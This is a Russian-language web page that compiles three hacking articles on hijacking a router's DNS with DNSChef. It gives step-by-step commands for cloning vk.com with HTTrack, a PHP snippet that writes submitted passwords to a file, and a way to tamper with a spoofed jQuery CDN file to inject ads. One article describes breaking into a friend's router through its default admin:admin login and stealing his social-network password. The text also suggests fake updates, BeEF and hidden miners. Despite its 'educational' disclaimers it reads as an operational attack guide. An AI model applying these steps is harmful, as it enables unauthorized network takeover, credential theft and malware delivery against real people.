Меню Рубрики

Подмена dns в роутере

Статья [0] — Подмена DNS роутера

r0hack

Всем Салам. Писал статью про подмену DNS роутера, похищения паролей и подстановки своей рекламы, но получалось все это дело слишком громоздким. И решил я разделить на 3 части. А может будет и четвертая часть, где будем настраивать SSL для нашего фейка и пятая часть, где создадим свою админку где будем собирать структурировано наши плоды. Дополнительные скорее всего будет, если интерес ко всему этому.

Итак, сегодня мы разберем поднятие нашего DNSChef. DNSChef — это DNS прокси, который поможет нам поднять фальшивый DNS, который мы подставим вместо нормально, который выдает нам провайдер.

DNS сервер — это такой же компьютер, где хранятся наши ip адреса. Когда мы вводим адрес сайта в браузере, обращаемся к DNS — серверу и говорим: «Эй, железяка, мне нужен ip адрес, на котором расположен этот сайт», он выдает нам ip, после переходим по нему и получаем в нашем браузере содержимое главной страницы. Грубое объяснения, но довольно таки понятно. Плюс, изображение:

Когда мы подставляем наш DNS сервер в роутер, то это так же работающий сервер, но мы уже можем перенаправлять пользователя на наш сайт. Т.е. теперь, когда жертва вводит vk.com, наш dns подсовывает жертве не настоящий ip адрес, а ip нашего сервера, где мы подняли фейк vk.com

Итак, что мы имеем:

  1. VPS сервер, где поднимем наш dns сервак и фейковый сайт.
  2. Роутер с возможностью изменения DNS, ну в современных вроде во всех можно. В моем случае имею Mikrotik hap lite

Здесь мы опишем подробно, как и где в роутере нам нужно подменить наш DNS адрес и конечно же установка и настройка DNSChef.

[1.1] — Установка и настройка DNSChef

Начнем с установки DNSChef, я устанавливаю и буду делать все на VPS Ubuntu 14.04. Вы можете взять себе VPS и ставить удобный для вас дистрибутив. Хостера также можете выбрать любого, но желательно конечно, чтобы дата-центры были за границей. У меня на ihor.ru в России, так как на этом VPS никаких махинаций не провожу. Из тех, которые за границей и довольно абузоустойчивый, могу порекомендовать zomro.com.

Для удобной настройки и добавления доменов и бд установим также на сервак панель VestaCP. Подробнее смотрите тут:

Думаю с этим у вас проблем не возникнет.

Дальше установим DNSChef:

Видим, что DNSChef запускается нормально. Теперь мы можем запустить и указать, какой домен будет фейковым и на каком ip будет лежать наш ip адрес. Запускаем все это дело таким образом:

[1.2] — Подмена DNS в роутере и создание домена

После этого идем и подставляем наш IP прокси в роутер. Как изменить DNS у вас на роутере можете найти в инете.

Готово. Дальше идем добавлять наш фейковый домен в VestaCP.

Домен добавили, когда мы это сделали через VestaCP, она автоматически настраивает и создает наш виртуальный хост.
Для примера создам тестовый файл index.html в папке vk.com с содержимым

И теперь если мы подключены к инету через роутер, где совершили подмену, то при переходе на другие сайты будет все работать правильно, а при переходе на vk.com, то сервер будет перенаправлять на наш и получим такое:

Вроде ничего не пропустил. Ну если что упомяните в комментах и разберем.
В итоге мы разобрали установку и настройку DNSChef и подмену DNS в нашем роутере.

В следующей части разберем способы граббинга сайта и похищения паролей.
До встречи!

Источник

Фишинговая атака с подменой DNS

Данная статья написана в ознакомительных целях, с одним единственным напутствием — просветить Вас о том, как не попасться на удочку злоумышленников, которые желают завладеть Вашими регистрационными данными (e-mail, логин, пароль и другими).

Однажды я решил проучить своего друга, сетевой роутер которого был защищён парой login: pass, которая конечно же никому не могла прийти в голову, а именно admin:admin . На мои доводы о том, что нужно сменить пароль на роутере, мой друг лишь отмахивался и говорил — «кому это нужно». В основном компьютер служил ему для того, чтобы пообщаться и полистать ленту новостей «В Контакте», данная соцсеть даже была установлена стартовой страницей по умолчанию в браузере Mozilla Firefox. Естественно, обо всём этом мне было известно.

В один прекрасный день дружбан прибежал с пар домой, включил комп зашёл в свой любимый контакт, ввёл логин и пароль, но социальная сеть не давала ему залогиниться. Друг отчаянно ввёл логин с паролем ещё 15 раз, и после очередной неудачной попытки позвонил мне. Я посоветовал ему перезагрузить роутер, после чего всё прекрасно заработало. Друг зашёл в ВК и увидел сообщение от «неизвестного человека», в котором были указаны его логин и пароль от ВКонтакта.

КАК МНЕ УДАЛОСЬ ЭТО СДЕЛАТЬ

1. Я создал свой DNS сервер;
2. Зашёл в настройки роутера друга (логин и пароль были мне известны);
3. Подменил DNS, указанный в его роутере, на свой и перезагрузил роутер.

1. Создание DNS сервера

Для того, чтобы создать свой DNS сервер, я взял в аренду самый дешёвый VDS (коих в сети предостаточно) под управлением операционной системы Linux Debian 8.5 (я использовал ruvds.com и далее буду рассматривать на его примере). Подключился к нему через специальное приложение PuTTY, введя предоставленные мне учётные данные от VDS и указав следующие значения:

1. Имя хоста (или IP адрес) — IP адрес моего VDS;
2. Порт — 22
3. Тип соединения — SHH;
4. Управление сеансами — любое название (например CODEBY.NET)
5. Сохранить;
6. Соединиться.

Открывается такое окошко, в котором мы вводим логин и пароль от VDS, которые можно вставить нажатием правой кнопки мыши (пароль в окне PuTTY не отображается никакими символами) и жмём Enter.

При появлении вопроса «Do you want continue [Y/n]» жмём Enter.

Далее для установки DNS сервера вводим следующие команды:

apt-get install python-ipy
apt-get install python-setuptools
easy_install pip
apt-get install apache2
pip install dnslib
aptitude install vsftpd
adduser username
apt-get update
apt-get install lamp-server^
apt-get install php5 php5-gd php5-mysql php5-curl php5-cli php5-cgi php5-dev
apt-get install phpmyadmin
usermod -a -G www-data username
chmod 777 /var/www/html/ -R
cd /etc
nano vsftpd.conf
(убрать комментарий в строчке # write_enable =YES)
service vsftpd restart
wget http://thesprawl.org/media/projects/dnschef-0.3.zip
apt-get install unzip
unzip dnschef*
cd dnschef*
chmod 755 *.py
python dnschef.py —help

Далее создаём нашу фишинговую страничку index.html и загружаем её на VDS при помощи клиента FileZilla.

Переходим Файл > Менеджер сайтов и вбиваем наши данные, указывая значения, как показано ниже, и жмём Соединиться .

Заходим в директорию /var/www/html, удаляем находящийся там файл index.html и загружаем вместо него наш фишинговый index.html.

Далее вновь запускаем PuTTY и вводим следующие значения:
Код:

python dnschef.py -i XXX.XXX.XXX.XXX —truedomains=codeby.net —fakeip=XXX.XXX.XXX.XXX —fakeipv6=XXXX:X:X:X:X:X:XXXX:XXXX —logfile=/root/redirect.log

—truedomains — разрешённые домены, к которым будет доступ (можно указать несколько через запятую);
IPV4 — это обычный IP нашего VDS сервера
IPV6 — нужно сконвертировать из нашего IPV4 (например на этом сайте: Конвертер IPv4/IPv6 | NetworkCenter )

На этом наш DNS сервер готов к работе.

На последнем шаге вбиваем в браузере IP-адрес и порт роутера нашего друга, вводим его учётные данные (логин и пароль), ищем, где прописан DNS, и заменяем его на наш DNS сервер.

На примере роутера TP-Link это выглядит так

Устанавливайте сложные пароли на свои роутеры и Ваша машина будет защищена от атак подобного рода! Мира Вам и Вашему дому!

Источник

💀Массовый взлом роутеров. Часть 2.

Продолжим статью с роутерами. В предыдущей статье мы получили понимание о уязвимостях и проблемах стандартных прошивок. В этой статье посмотрим, что можно с этим сделать.

А можно сделать действительно многое, но вся зависит от ваших знаний и умений.В статье будут основы и азы, все остальное можно найти или придумать самому.

Заранее предупреждаю, что вмешиваюсь в работу чужой сети вы можете понести ответственность. Все материалы предоставляются исключительно в ознакомительных целях. Помните и думайте, перед там, как что-то делать.

Установка и запуск DNSChef

После получения доступа к роутеру есть смысл подумать о подмене DNS. Для этого можно воспользоваться разнообразными инструментами. Оптимальные вариант DNSChef, которые можно запустить, как на отдельном VDS, так и на Kali Linux. В последнем варианте утилита установлена по умолчанию.

Команды для установки DNSChef для Убунту:

Проверить работоспособность можно с помощью команды:

После установки и запуска можно переходить к функционалу. С помощью команды мы можем, например, подменивать сайты или слушать трафик. Это полезно для дальнейшей атаки, так как можно понять, какие сайты посещает пользователь и основываясь на этом – можно сделать фейк.

Для запуска подмены сайта необходимо запустить такую команду:

python dnschef.py -i IP_DNS_Прокси —fakeip IP_сервера —fakedomains vk.com

Для монитора трафика можно использовать этот способ. Если поставить команду nohup, а после команды символ &; это приведёт к тому, что после закрытия терминала процесс продолжит свою работу в фоне:

sudo nohup dnschef -i IP_вашего_DNS_прокси —logfile=/root/dns.log &

Смотреть данные с файла удобно в таком формате:

Запретить доступ к интернету можно с помощью команды:

sudo nohup dnschef -i IP_вашего_DNS_прокси —fakeip 127.0.0.1 —logfile=/root/dns.log &

Указываем DNS в роутере

После этого нужно добавить DNS сервер в роутер. Как добавить DNS сервер в роутер можно посмотреть в сети. Как правило, можно зайти и добавит IP на интуитивном уровне.

Что можно сделать?

Можно, например, собрать базу всех часто посещаемых сайтов у сотрудников или коллег и заменит их на что-то полезное: мотивацию к действию, картинку или какой-то вирус. Все на ваше желание и усмотрение. Я хочу только показать, что, если знать, какие сайты посещает жертва, и добавить немного социальной инженерии можно с высокой вероятность перехватить пароли и загрузить фейковое обновление.

Можно воспользоваться любым сервисом для локальных компьютеров или воспользоваться бесплатной утилитой Vesta CP. После создания и запуска виртуального хоста и соответствующей команды для замены в DNSChef:

python dnschef.py -i IP_DNS_Прокси —fakeip IP_сервера —fakedomains vk.com

Как получить пароли с сайта?

Немного сложнее, но просто. Для создания хорошего фейка нужно воспользоваться утилитой HTTrack. Более детально описывать не буду, так и так понятно, что можно сделать. Еще раз обращаю внимание на то, что нужно проводить «развекду». Так вы будете знать точно, какие сайты посещает целевой пользователь.

На примере сайта vk.com необходимо выполнить такую команду:

httrack https://vk.com —headers «Accept-Language: ru-RU,ru;q=0.5» -r2 -F «Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36» -O «/home/admin/web/vk.com/public_html»

После завершения у вас будет полная копия сайта в папке vk.com. Далее нам необходимо заниматься обработкой событий после регистрации. Такими нехитрыми действиями пароли отправляться нам в файл. Это можно сделать с помощью такого варианта.

Нужно создать обработчик в корне каталога сайта с таким кодом c названием good.php:

file_put_contents($file, print_r($_POST, true), FILE_APPEND);

После этого необходимо найти в коде главной страницы такую строки и добавить свой обработчик. Вместо ссылки указываем good.php.

После этого сохраняем и перезагружаем. После ввода данных они будут отображаться в нашем файле login.txt. Для удобного мониторинга можно воспользоваться командой. Данные будут отображаться в формате массива данных:

Я думаю, что таким нехитрым и не сложным способом можно сделать фейк практически любого сайта. Если дополнительно использовать навыки социальной инженерии, то можно достичь высокой вероятности ввода данных.

Данный метод не подходит для HSTS. Для работы с такими соединениями можно воспользоваться утилитами SSLStrip и dns2proxy.

Что можно придумать еще?

На самом деле вариантов может быть куча: обновления, плагины, приложения и т.д.. Когда у нас есть доступ и весь трафик контролируется, то можно добавлять что угодно. Можно использовать еще фейковые обновление или установка дополнительных плагинов, таких как BeEF. Рассмотрим, как можно еще отображать рекламу.

Для работы с рекламой используются разные CDN ( Content Delivery Network или Content Distribution Network ). CDN способствует увеличению скорости загрузки интернет-пользователями аудио-, видео-, программного, игрового и других видов цифрового содержимого в точках присутствия сети CDN. Такую сетевую инфраструктуру можно реализовать в разных вариантах. Рассмотрим, как заражать сайты всплывающей рекламой, если сайт использует CDN jQuery.

Для этого нужно поднять сайт на локальном сервере code.jquery.com. После этого нужно изменить в коде js файле то, что нам нужно. Выгрузить можно по ссылке http://code.jquery.com/jquery-1.9.1.js .

Для добавления простой рекламы достаточно добавить такую конструкцию в конце файла:

После добавления этого кода в файл, на сайте будет добавляться всплывающая реклама через 5 секунд. В интернете можно найти разнообразные мануалы, как создавать такие страницы. Вот пример с исходным кодом.

Чтобы закрыть максимальное количество вариантов, которые используют другие сайты в качестве CDN нужно воспользоваться командой:

python dnschef.py -i IP_DNS_Прокси —fakeip IP_сервера —fakedomains vk.com= code.jquery.com, jquery.com,www.code.jquery.com

Заключение

Это более несколько примеров для дальнейшей оптимизации и использования. Можно доработать каждый способ в зависимости от целей. Можно получить полное управление ПК или доставить скрытый майнер. Поэтому можете дальше сами дорабатывать и использовать.

Подписывайся на канал и ставь лайки, чтобы скорее увидеть новые интересные статьи!

Источник

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

  • Подлежит ли ремонту роутер
  • Подлежит ли возврату роутер
  • Подключиться к удаленному рабочему столу через роутер
  • Подключиться к роутеру тенда
  • Подключиться к роутеру кинетик